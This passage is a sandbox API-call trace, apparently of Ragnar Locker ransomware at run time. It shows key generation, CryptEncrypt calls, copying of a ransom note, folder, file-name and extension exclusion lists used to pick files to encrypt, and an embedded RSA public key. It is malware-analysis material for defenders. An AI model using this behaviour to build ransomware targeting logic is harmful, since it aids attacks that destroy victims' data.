dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556550) returned 1 [0169.368] CryptGenRandom (in: hProv=0x3556550, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0169.368] CryptReleaseContext (hProv=0x3556550, dwFlags=0x0) returned 1 [0169.368] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0169.371] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556e58) returned 1 [0169.519] CryptGenRandom (in: hProv=0x3556e58, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0169.527] CryptReleaseContext (hProv=0x3556e58, dwFlags=0x0) returned 1 [0169.527] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0169.530] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556990) returned 1 [0169.531] CryptGenRandom (in: hProv=0x3556990, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0169.531] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0169.531] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0169.535] CryptEncrypt (in: hKey=0x3548280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0169.539] GetLastError () returned 0x80090016 [0169.539] CryptEncrypt (in: hKey=0x3548280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0169.630] GetLastError () returned 0x80090016 [0169.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xa80) returned 0x3f0 [0169.631] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0169.856] GetProcessHeap () returned 0x3520000 [0169.856] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x357e308 | out: hHeap=0x3520000) returned 1 [0169.857] CloseHandle (hObject=0x3b4) returned 1 [0169.857] GetProcessHeap () returned 0x3520000 [0169.857] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0169.860] CloseHandle (hObject=0x3f0) returned 1 [0169.860] GetProcessHeap () returned 0x3520000 [0169.860] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0169.861] FindClose (in: hFindFile=0x3548240 | out: hFindFile=0x3548240) returned 1 [0169.862] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1029", cAlternateFileName="")) returned 1 [0169.862] lstrcmpiW (lpString1="1029", lpString2=".") returned 1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="..") returned 1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="Windows") returned -1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="Windows.old") returned -1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="Tor browser") returned -1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="Internet Explorer") returned -1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="Google") returned -1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="Opera") returned -1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="Opera Software") returned -1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="Mozilla") returned -1 [0169.862] lstrcmpiW (lpString1="1029", lpString2="Mozilla Firefox") returned -1 [0169.863] lstrcmpiW (lpString1="1029", lpString2="$Recycle.Bin") returned 1 [0169.863] lstrcmpiW (lpString1="1029", lpString2="ProgramData") returned -1 [0169.863] lstrcmpiW (lpString1="1029", lpString2="All Users") returned -1 [0169.863] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0169.863] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1029" | out: lpString1="1029") returned="1029" [0169.863] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\" [0169.863] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1029\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\" [0169.863] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\!$R4GN4R_B8CF767A$!.txt" [0169.863] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1029\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0169.869] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*" [0169.869] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.870] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0169.870] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0169.870] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547c40 [0169.870] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0169.870] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf2974fb8, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.872] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0169.872] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0169.872] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf296ee14, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf296ee14, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0169.872] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0169.872] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0169.872] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.872] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0169.872] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0169.873] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0169.873] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0169.873] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0169.873] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0169.873] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0169.873] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0169.873] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0169.873] FindClose (in: hFindFile=0x3547c40 | out: hFindFile=0x3547c40) returned 1 [0169.873] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3548240 [0169.873] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf2974fb8, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf2974fb8, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.874] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf296ee14, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf296ee14, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0169.874] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.874] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0169.874] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0169.874] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0169.874] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.874] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.874] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0169.874] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned=".rtf" [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0169.874] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0169.875] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0169.875] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0169.875] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0169.875] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0169.875] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0169.875] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0169.875] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0169.875] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0169.875] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0169.875] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0169.875] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0169.875] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0169.875] GetProcessHeap () returned 0x3520000 [0169.875] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0169.877] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" [0169.877] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0169.877] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.877] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0169.877] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned=".xml" [0169.877] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0169.877] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0169.877] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0169.877] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0169.878] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0169.878] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0169.878] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0169.878] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0169.878] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0169.878] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0169.878] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0169.878] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0169.878] GetProcessHeap () returned 0x3520000 [0169.878] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0169.880] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" [0169.880] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0169.880] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1029\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0169.880] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0169.880] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned=".dll" [0169.880] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0169.880] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0169.880] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0169.880] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0169.880] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0169.880] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0169.880] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0169.881] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0169.881] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0169.881] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0169.881] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0169.881] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0169.881] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0169.881] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0169.881] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0169.881] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0169.881] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0169.881] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0169.881] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0169.881] GetProcessHeap () returned 0x3520000 [0169.881] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586880 [0169.881] CryptAcquireContextW (in: phProv=0x3586880, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586880*=0x3556550) returned 1 [0169.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0169.882] GetProcessHeap () returned 0x3520000 [0169.882] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x35409f8 [0169.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x35409f8, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0169.882] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.882] GetProcessHeap () returned 0x3520000 [0169.882] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35948f0 [0169.882] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC 